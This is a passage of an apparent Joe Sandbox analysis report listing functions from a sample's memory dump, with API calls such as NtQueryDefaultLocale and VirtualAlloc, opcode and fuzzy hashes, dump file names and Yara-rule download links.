Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: I@JA
API String ID: 2949231068-3163526114
Opcode ID: b4bcd7b9c3bae49e00fc71c9ee72fda82ddda9d7847e827acb069b376990abcf
Instruction ID: 06b353535dcdc859f0034f7b559fc19347504739200407afbfc489a7606d802f
Opcode Fuzzy Hash: b4bcd7b9c3bae49e00fc71c9ee72fda82ddda9d7847e827acb069b376990abcf
Instruction Fuzzy Hash: 852149F2D085686BE3248B25DC54BE77B78EF11320F1900FAD94996541E23C9AC68FA2

Function 00416776 Relevance: 2.0, APIs: 1, Instructions: 508nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 5a3031c958d47cde5423dd111f999a9b881f198710d62490f9b85713a9b15fcc
Instruction ID: f2660a84a9785de92d6c4179d1ea05aee36040fdd5cdfb55622016ef69124e4c
Opcode Fuzzy Hash: 5a3031c958d47cde5423dd111f999a9b881f198710d62490f9b85713a9b15fcc
Instruction Fuzzy Hash: 9712C2B1D042289BEB248B14DD90BEAB7B5EB85310F1581FAD84D56640D738AFC2CF95

Function 0041667D Relevance: 1.7, APIs: 1, Instructions: 215nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 59459fa92b677c7f1ad3f86b7172cfd0b0f8ee9eeec140b959236eb366d536dd
Instruction ID: cf0f9888e6c0fdfe7daccb9502d171945e63c8099a6660917ff7317841e0266c
Opcode Fuzzy Hash: 59459fa92b677c7f1ad3f86b7172cfd0b0f8ee9eeec140b959236eb366d536dd
Instruction Fuzzy Hash: 947113B2D042289BE7208B24DC44BFA7775FF91314F1581FAD84D96681E3389BC68F56

Function 00416CA5 Relevance: 1.6, APIs: 1, Instructions: 137nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 8d0192dd0f5896126fc7ff6dfbb567c905dcaa6bf0117c013203f66975b3b8bf
Instruction ID: 1028634a6bf4f8049a259c7867131b0f5d336b0347058969114afb50d522907d
Opcode Fuzzy Hash: 8d0192dd0f5896126fc7ff6dfbb567c905dcaa6bf0117c013203f66975b3b8bf
Instruction Fuzzy Hash: B3412BB2E08528ABE7248B14EC90BE7BB79EF41310F1541FBD84D96541D33C9AC2CE92

Function 00417022 Relevance: 1.6, APIs: 1, Instructions: 134nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 03b83186ecf23a8079fecdafceb0ad7b2bf641fe006b3c9ea8605ab7f265595d
Instruction ID: b7d811c6d2bb5e259764b7a113c416bce8973ca7d2948076c3acdb6140548a33
Opcode Fuzzy Hash: 03b83186ecf23a8079fecdafceb0ad7b2bf641fe006b3c9ea8605ab7f265595d
Instruction Fuzzy Hash: D141E7B1C4C3A9ABD7248B64CC907E67BB4EB01314F1445EFD98997241E6388AC68B56

Function 00416CB0 Relevance: 1.6, APIs: 1, Instructions: 133nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 59ef3bb343ccb5e1dc795bef17398f3df400dbea5bbcbae35d9b2a93684dc631
Instruction ID: 10ab5086ccf39943dbca8d18a34557127348a894a2eb6a419f6d153ec376d46d
Opcode Fuzzy Hash: 59ef3bb343ccb5e1dc795bef17398f3df400dbea5bbcbae35d9b2a93684dc631
Instruction Fuzzy Hash: E84119B2E041685BE7248A15DC90BE77B79EB41320F1541FBD84D96141D33C9AC2CE92

Function 00416CCA Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 0d918f5b9963b250515dccaacc08a8527288cd87e552eb7d49bef6961426946f
Instruction ID: bf31712f180945f5532ac7c0dfe1127d151f636112b3bf4659d251a4013e6da2
Opcode Fuzzy Hash: 0d918f5b9963b250515dccaacc08a8527288cd87e552eb7d49bef6961426946f
Instruction Fuzzy Hash: 4D4118B2E041685BE7248B15EC90BE7BB79EF41320F1541FBD84996541D33C9FC28E92

Function 004169EC Relevance: 1.6, APIs: 1, Instructions: 125nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 9df6a4139d0d2340a4e7d129edab66884f2382b7773cc859605464fd8f4c8c60
Instruction ID: aeb2097c590350ad6ee95054d537edc73b8af0d380c24e94857321f6353d3bcf
Opcode Fuzzy Hash: 9df6a4139d0d2340a4e7d129edab66884f2382b7773cc859605464fd8f4c8c60
Instruction Fuzzy Hash: E841F4B2D04228AFE7248B24DC90BE77B78EF05310F1541FAD94D96641E23C9FC68E92

Function 00416817 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 85424e1e67ac8c9145b9db495f4daf2206b09570989eb91425ba81a9d0bbb0d3
Instruction ID: e4f1cecde8d617e0ccbf1f1b82d8ebb92770803450cfe7a5806b6b76b92339ae
Opcode Fuzzy Hash: 85424e1e67ac8c9145b9db495f4daf2206b09570989eb91425ba81a9d0bbb0d3
Instruction Fuzzy Hash: BE4138B2D092549FE7108B25DC447F77B75EF82710F1680FBE84986542E23C9AC79B62

Function 004168F4 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: d711917c81ac227287c1750c0a239f9db3dfe0aa47d58f1dab333508e2fd9e91
Instruction ID: d94f48bccc68e64d8e14564b099fed645b82ada4d70b08f588de47d584cdd56e
Opcode Fuzzy Hash: d711917c81ac227287c1750c0a239f9db3dfe0aa47d58f1dab333508e2fd9e91
Instruction Fuzzy Hash: 343124F2D08158AFE7208A21DC80BF77B79EB82314F1580FAD94986581D23C5AC78F52

Function 00417133 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 63c791266eb70461723bb68008e4cf346df16934014055f5d397327415662198
Instruction ID: 2ffd8c8c47cb39308c457f991e7b39201cca25e0530b53e3e4a9738c42e267a8
Opcode Fuzzy Hash: 63c791266eb70461723bb68008e4cf346df16934014055f5d397327415662198
Instruction Fuzzy Hash: 1D41C1B1D082589FDB24CB20CC907E677B4FF42310F2445EAD84897241E6399AC6CF16

Function 004166AE Relevance: 1.6, APIs: 1, Instructions: 98nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: d57f6e15d686dfbf528cfcf1814c6aa9e2e2efbae599cdf643a6c335a312484a
Instruction ID: 774b0fec5aa23574fe4b3cdad8a22e809be80c94f210ab0822c5a119745d117e
Opcode Fuzzy Hash: d57f6e15d686dfbf528cfcf1814c6aa9e2e2efbae599cdf643a6c335a312484a
Instruction Fuzzy Hash: D53148F2D18654AFF7108A24DC84BF73B79EBD1314F1680FBD94846981D23C5AC78A52

Function 0041718B Relevance: 1.6, APIs: 1, Instructions: 85nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 5b2f8ecec2483b2cca8d30ead51cf55cd3240ab035214208f4480a31cd816b10
Instruction ID: 67db15b722ca470fe7faa6546b2a550478ee8e4cc3aeb9d25c4160829336223a
Opcode Fuzzy Hash: 5b2f8ecec2483b2cca8d30ead51cf55cd3240ab035214208f4480a31cd816b10
Instruction Fuzzy Hash: E131C3B1C082999FD724CB24CC907E67BB4FF01314F2445EED84897282E6389AC6CF55

Function 0041741B Relevance: 1.6, APIs: 1, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: d02776d87926c49c3a205901e74d72355ed4ddbe3465c53d52234269d0351399
Instruction ID: 3df9888577b18123dd39ea62242d633e8315d7f160ccfc61a4e9d6eb8b90d62a
Opcode Fuzzy Hash: d02776d87926c49c3a205901e74d72355ed4ddbe3465c53d52234269d0351399
Instruction Fuzzy Hash: 6F21F6B1D085999BD720CB15CC90BEBBBB4FF46310F1881EAD88997642D2385AC6CF52

Function 00417430 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 9d6fd4aa9e04aab29d42247b339925ea5cf3aa601b34c3a9c3dcde2bb8b7dff7
Instruction ID: fa18beae47fcdfa1cd365837ec87f141bfd18453a3f180c476c69577d8581926
Opcode Fuzzy Hash: 9d6fd4aa9e04aab29d42247b339925ea5cf3aa601b34c3a9c3dcde2bb8b7dff7
Instruction Fuzzy Hash: 7D21C7B1D086999FDB20CB14CC907EABBB4FF46314F1441EAD88997641E2385EC6CF52

Function 00416993 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 1483383765f1cfd51dcce7d230b2c17b66b595a48f1c50d2a0b1735e8012bb66
Instruction ID: f398059b22583b82b339f0c3e3e8fbf34d72fffc4ee610571627a6a97187914e
Opcode Fuzzy Hash: 1483383765f1cfd51dcce7d230b2c17b66b595a48f1c50d2a0b1735e8012bb66
Instruction Fuzzy Hash: 84113AF1D0C2949FE7108B25DC90BE67B78EF42310F1980FFD94886542D23C9AC68B52

Function 00416DDA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 5174a2dd9217f9427674ceb0c2f3f3c1d7a42abe70441ef0711f9bf011556f77
Instruction ID: a9473657e0555dd9abd3046f59b2817e3b0620f52b60ee51d76898ed3679e195
Opcode Fuzzy Hash: 5174a2dd9217f9427674ceb0c2f3f3c1d7a42abe70441ef0711f9bf011556f77
Instruction Fuzzy Hash: 20112CB2C486999FD3108B25DC907E77BB8EF11314F1901FAC889C6542D13D9AC6CF92

Function 0041D440 Relevance: 1.5, APIs: 1, Instructions: 215memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
